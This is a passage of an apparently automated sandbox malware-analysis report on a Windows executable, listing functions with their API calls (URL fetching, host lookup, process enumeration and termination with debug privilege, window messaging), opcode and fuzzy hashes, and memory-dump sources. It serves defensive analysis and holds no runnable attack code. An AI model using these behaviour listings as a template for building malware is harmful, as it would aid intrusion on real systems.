                                                                                              Similarity
                                                                                              • API ID: ClassMessageNameParentSend
                                                                                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                              • API String ID: 1290815626-3381328864
                                                                                              • Opcode ID: a579cdfc0aca8a98899232b1c8af17038ab5c3ad304d2696679c8ea2c229d47c
                                                                                              • Instruction ID: 6cfe8a1eae6fb9ee4c6f9e02578cb36329cf66080e35b00c8a762b95367d6e54
                                                                                              • Opcode Fuzzy Hash: a579cdfc0aca8a98899232b1c8af17038ab5c3ad304d2696679c8ea2c229d47c
                                                                                              • Instruction Fuzzy Hash: 9611A07628831BBAFA003620EC07EF6779DDF05730F20412AFA41E61D1EE71A9419A74
                                                                                              Function 00DDCAA0 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00DDCADF
                                                                                              • GetLastError.KERNEL32 ref: 00DDCAF2
                                                                                              • SetEvent.KERNEL32(?), ref: 00DDCB06
                                                                                                • Part of subcall function 00DDCBB0: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00DDCBCF
                                                                                                • Part of subcall function 00DDCBB0: GetLastError.KERNEL32 ref: 00DDCC7F
                                                                                                • Part of subcall function 00DDCBB0: SetEvent.KERNEL32(?), ref: 00DDCC93
                                                                                                • Part of subcall function 00DDCBB0: InternetCloseHandle.WININET(00000000), ref: 00DDCC9E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                              • String ID:
                                                                                              • API String ID: 337547030-0
                                                                                              • Opcode ID: 9a5dfe86037498e86ca8fe7f4c4db3e8212f193ef1af8391a249f41984c27104
                                                                                              • Instruction ID: dd95a05111688a73970aee621e488045aa5e835591ec21f179ba03406b364fa9
                                                                                              • Opcode Fuzzy Hash: 9a5dfe86037498e86ca8fe7f4c4db3e8212f193ef1af8391a249f41984c27104
                                                                                              • Instruction Fuzzy Hash: 99314671210706AFDB219F61CD45A76BBEAFF08300F15941FA99AC6710DB30E814EBB0
                                                                                              Function 00DC2093 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00DC1CD9,?,?,00000000), ref: 00DC209C
                                                                                              • HeapAlloc.KERNEL32(00000000,?,00DC1CD9,?,?,00000000), ref: 00DC20A3
                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00DC1CD9,?,?,00000000), ref: 00DC20B8
                                                                                              • GetCurrentProcess.KERNEL32(?,00000000,?,00DC1CD9,?,?,00000000), ref: 00DC20C0
                                                                                              • DuplicateHandle.KERNEL32(00000000,?,00DC1CD9,?,?,00000000), ref: 00DC20C3
                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00DC1CD9,?,?,00000000), ref: 00DC20D3
                                                                                              • GetCurrentProcess.KERNEL32(00DC1CD9,00000000,?,00DC1CD9,?,?,00000000), ref: 00DC20DB
                                                                                              • DuplicateHandle.KERNEL32(00000000,?,00DC1CD9,?,?,00000000), ref: 00DC20DE
                                                                                              • CreateThread.KERNEL32(00000000,00000000,00DC2104,00000000,00000000,00000000), ref: 00DC20F8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                              • String ID:
                                                                                              • API String ID: 1957940570-0
                                                                                              • Opcode ID: 73352884c8f1463946dc4ea04c7ac635dd78814043abbe397f9bb5595e10fab9
                                                                                              • Instruction ID: 6eb724f871e35ff0555003eb3e74ddbb61a3f1c214c60ca5f9e9ba5c5c7672ee
                                                                                              • Opcode Fuzzy Hash: 73352884c8f1463946dc4ea04c7ac635dd78814043abbe397f9bb5595e10fab9
                                                                                              • Instruction Fuzzy Hash: F801CDB5240308BFE710AFA5DC4DF6B3BAEEB89711F008411FA05DB2A1CA709810CB30
                                                                                              Function 00DEAA41 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00DCDC9C: CreateToolhelp32Snapshot.KERNEL32 ref: 00DCDCC1
                                                                                                • Part of subcall function 00DCDC9C: Process32FirstW.KERNEL32(00000000,?), ref: 00DCDCCF
                                                                                                • Part of subcall function 00DCDC9C: CloseHandle.KERNELBASE(00000000), ref: 00DCDD9C
                                                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00DEAACC
                                                                                              • GetLastError.KERNEL32 ref: 00DEAADF
                                                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00DEAB12
                                                                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 00DEABC7
                                                                                              • GetLastError.KERNEL32(00000000), ref: 00DEABD2
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00DEAC23
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                              • String ID: SeDebugPrivilege
                                                                                              • API String ID: 2533919879-2896544425
                                                                                              • Opcode ID: d7aa101c618a3f4028cfbbe020d47488b026047666117a986f26554e5bb43c4c
                                                                                              • Instruction ID: 6e0aab8d125b70ce0d0aaa2152ed682d9c309dc6ac7f4d84b8b54545581ce598
                                                                                              • Opcode Fuzzy Hash: d7aa101c618a3f4028cfbbe020d47488b026047666117a986f26554e5bb43c4c
                                                                                              • Instruction Fuzzy Hash: 81618D342082429FD310EF19C594F26BBE6AF54318F19849CE46A8B7A2C775FD45CBB2
                                                                                              Function 00DF41E5 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00DF4284
                                                                                              • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00DF4299
                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00DF42B3
                                                                                              • _wcslen.LIBCMT ref: 00DF42F8
                                                                                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 00DF4325
                                                                                              • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00DF4353
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window_wcslen
                                                                                              • String ID: SysListView32
                                                                                              • API String ID: 2147712094-78025650
                                                                                              • Opcode ID: a22defd22f5ffa1f28bdb13a5dbc2ef0fcd7f36c581cef884402f47b31b9c59c
                                                                                              • Instruction ID: 6bfaa0bae548cdcb3d9888b46ad14fa8402a8f48547fc4e0f12db8a69657dcb4
                                                                                              • Opcode Fuzzy Hash: a22defd22f5ffa1f28bdb13a5dbc2ef0fcd7f36c581cef884402f47b31b9c59c
                                                                                              • Instruction Fuzzy Hash: 3841913190031CABEB219F64CC45BFB7BA9EF08350F154526FA54E7291D7719990CBA4
                                                                                              Function 00DCC53A Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00DCC5D9
                                                                                              • IsMenu.USER32(00000000), ref: 00DCC5F9
                                                                                              • CreatePopupMenu.USER32 ref: 00DCC62F
                                                                                              • GetMenuItemCount.USER32(018565D0), ref: 00DCC680
                                                                                              • InsertMenuItemW.USER32(018565D0,?,00000001,00000030), ref: 00DCC6A8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                              • String ID: 0$2
                                                                                              • API String ID: 93392585-3793063076
                                                                                              • Opcode ID: 904f96722c78e1f528fc8f4f3bb2936089493fbbbb286f13bcdc760700f8c7aa
                                                                                              • Instruction ID: 517afb7ae2884e23c3760ef5370aa3225ea42384ab45b3835e7e961b49430601
                                                                                              • Opcode Fuzzy Hash: 904f96722c78e1f528fc8f4f3bb2936089493fbbbb286f13bcdc760700f8c7aa
                                                                                              • Instruction Fuzzy Hash: 6351AE70A50306ABDF20DF68CA84FAEBBF5AF44314F28611DE609972A1E770D941CB31
                                                                                              Function 00DCE653 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                              • String ID: 0.0.0.0
                                                                                              • API String ID: 642191829-3771769585
                                                                                              • Opcode ID: 7ac1b2150a6cb8f16cfb4c00b305a7e6b2b81c37f090b2ecbbc96226deaf4b18
                                                                                              • Instruction ID: e4406a6555120d4845be9c3b201cf558efdfb88357ec7e9e233d917ba2fc8857
                                                                                              • Opcode Fuzzy Hash: 7ac1b2150a6cb8f16cfb4c00b305a7e6b2b81c37f090b2ecbbc96226deaf4b18
                                                                                              • Instruction Fuzzy Hash: CE11DF72900216ABDB247B209C4AFEA77BDDF00710F1500A9F545E7191EB70CA81DBB0
                                                                                              Function 00DE42A4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • VariantInit.OLEAUT32(?), ref: 00DE42C8
                                                                                              • CharUpperBuffW.USER32(?,?), ref: 00DE43D7
                                                                                              • _wcslen.LIBCMT ref: 00DE43E7
                                                                                              • VariantClear.OLEAUT32(?), ref: 00DE457C
                                                                                                • Part of subcall function 00DD15B3: VariantInit.OLEAUT32(00000000), ref: 00DD15F3
                                                                                                • Part of subcall function 00DD15B3: VariantCopy.OLEAUT32(?,?), ref: 00DD15FC
                                                                                                • Part of subcall function 00DD15B3: VariantClear.OLEAUT32(?), ref: 00DD1608
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                              • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                              • API String ID: 4137639002-1221869570
                                                                                              • Opcode ID: 6131af0ac07700c63468d08a93c021769440b3b1013a5c07b9ffbad345011370
                                                                                              • Instruction ID: 2639aace12a6b682e5ed046e1ae2bd6cd6ed9abcff91ec1512c856b32cee5115
                                                                                              • Opcode Fuzzy Hash: 6131af0ac07700c63468d08a93c021769440b3b1013a5c07b9ffbad345011370
                                                                                              • Instruction Fuzzy Hash: C8916A75A083419FC700EF69C48196AB7E5FF88314F14892DF89A9B351DB31ED46CBA2
                                                                                              Function 00DF2A5C Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetMenu.USER32(?), ref: 00DF2AE2
                                                                                              • GetMenuItemCount.USER32(00000000), ref: 00DF2B14
                                                                                              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00DF2B3C
                                                                                              • _wcslen.LIBCMT ref: 00DF2B72
                                                                                              • GetMenuItemID.USER32(?,?), ref: 00DF2BAC
                                                                                              • GetSubMenu.USER32(?,?), ref: 00DF2BBA
                                                                                                • Part of subcall function 00DC42CC: GetWindowThreadProcessId.USER32(?,00000000), ref: 00DC42E6
                                                                                                • Part of subcall function 00DC42CC: GetCurrentThreadId.KERNEL32 ref: 00DC42ED
                                                                                                • Part of subcall function 00DC42CC: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00DC2E43), ref: 00DC42F4
                                                                                              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00DF2C42
                                                                                                • Part of subcall function 00DCF1A7: Sleep.KERNEL32 ref: 00DCF21F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 4196846111-0
                                                                                              • Opcode ID: 58b10e74f57d6858b3c3863b772e98aa317b73cf96cbb8248333e873af6b81eb
                                                                                              • Instruction ID: 359a6ec585482716c116312a8d2708631ce7038ac3a74d178e536442b3301a7d
                                                                                              • Opcode Fuzzy Hash: 58b10e74f57d6858b3c3863b772e98aa317b73cf96cbb8248333e873af6b81eb
                                                                                              • Instruction Fuzzy Hash: E4716D75A00209AFCB10EFA4C885ABEBBB5EF48310F158459E956EB351DB74ED41CBB0
                                                                                              Function 00DF87FD Relevance: 10.7, APIs: 7, Instructions: 193windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • IsWindow.USER32(00000000), ref: 00DF8896
                                                                                              • IsWindowEnabled.USER32(00000000), ref: 00DF88A2
                                                                                              • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00DF897D
                                                                                              • SendMessageW.USER32(00000000,000000B0,?,?), ref: 00DF89B0
                                                                                              • IsDlgButtonChecked.USER32(?,00000000), ref: 00DF89E8
                                                                                              • GetWindowLongW.USER32(00000000,000000EC), ref: 00DF8A0A
                                                                                              • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00DF8A22
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                              • String ID:
                                                                                              • API String ID: 4072528602-0
                                                                                              • Opcode ID: cb15167fa8fe23a34cc04735143c898232d008bf9615e611f9d49209f13971d3
                                                                                              • Instruction ID: a524bb82f4cb4074efd89097d75c557f7d653f497aa1c937c7632625061635e3
                                                                                              • Opcode Fuzzy Hash: cb15167fa8fe23a34cc04735143c898232d008bf9615e611f9d49209f13971d3
                                                                                              • Instruction Fuzzy Hash: F271B03460420CAFEF219F50C894FBA7BB5EF49340F598459EA8597261CB71AE40EF32
                                                                                              Function 00DC808C Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00DC80D1
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00DC80F7
                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 00DC80FA
                                                                                              • SysAllocString.OLEAUT32 ref: 00DC811B
                                                                                              • SysFreeString.OLEAUT32 ref: 00DC8124
                                                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 00DC813E
                                                                                              • SysAllocString.OLEAUT32(?), ref: 00DC814C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                              • String ID:
                                                                                              • API String ID: 3761583154-0
                                                                                              • Opcode ID: f5500c09c1cf247aadccdc8ec2c964b52b790d4eead363a7735c20fbb8383212
                                                                                              • Instruction ID: 2251b51076f63c37f0a706274e1d65c10b40f0b509148534f7188b76b39f2af1
                                                                                              • Opcode Fuzzy Hash: f5500c09c1cf247aadccdc8ec2c964b52b790d4eead363a7735c20fbb8383212
                                                                                              • Instruction Fuzzy Hash: 88218671200305AFDB10AFA8DC88DBA77EDEB493607088129F905CB2A0DA70EC45E774
                                                                                              Function 00DD0D8E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(0000000C), ref: 00DD0DAE
                                                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00DD0DEA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateHandlePipe
                                                                                              • String ID: nul
                                                                                              • API String ID: 1424370930-2873401336
                                                                                              • Opcode ID: c4a2da7eca29bf082f9b40542660e0a9a3300e027fe0968e1b7ba89203176801
                                                                                              • Instruction ID: 13cc19df83f681dd2d9902a59e1649bb698d55136e03d1ebaeea646c913e67eb
                                                                                              • Opcode Fuzzy Hash: c4a2da7eca29bf082f9b40542660e0a9a3300e027fe0968e1b7ba89203176801
                                                                                              • Instruction Fuzzy Hash: 96214B70500305AFDB208F69D808BAABFA5AF85720F244E1AF9A1E73E0D7709850CB70
                                                                                              Function 00DF4A0C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00D6771B: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00D67759
                                                                                                • Part of subcall function 00D6771B: GetStockObject.GDI32(00000011), ref: 00D6776D
                                                                                                • Part of subcall function 00D6771B: SendMessageW.USER32(00000000,00000030,00000000), ref: 00D67777
                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00DF4A71
                                                                                              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00DF4A7E
                                                                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00DF4A89
                                                                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00DF4A98
                                                                                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00DF4AA4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$CreateObjectStockWindow
                                                                                              • String ID: Msctls_Progress32
                                                                                              • API String ID: 1025951953-3636473452
                                                                                              • Opcode ID: df081566bf9731ca5445b008ad6feaf24795adde2e3f9475a21e868b0f24c619
                                                                                              • Instruction ID: 011f98de3355291c71d4ed15f6024fda760e908cce1766ca3a832c0bd8833da0
                                                                                              • Opcode Fuzzy Hash: df081566bf9731ca5445b008ad6feaf24795adde2e3f9475a21e868b0f24c619
                                                                                              • Instruction Fuzzy Hash: 781182B215021DBEEF119F64CC85EE77F9DEF08758F018111BB58A6190CA729C21DBB4
                                                                                              Function 00DCE223 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00DCE23D
                                                                                              • LoadStringW.USER32(00000000), ref: 00DCE244
                                                                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00DCE25A
                                                                                              • LoadStringW.USER32(00000000), ref: 00DCE261
                                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00DCE2A5
                                                                                              Strings
                                                                                              • %s (%d) : ==> %s: %s %s, xrefs: 00DCE282
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
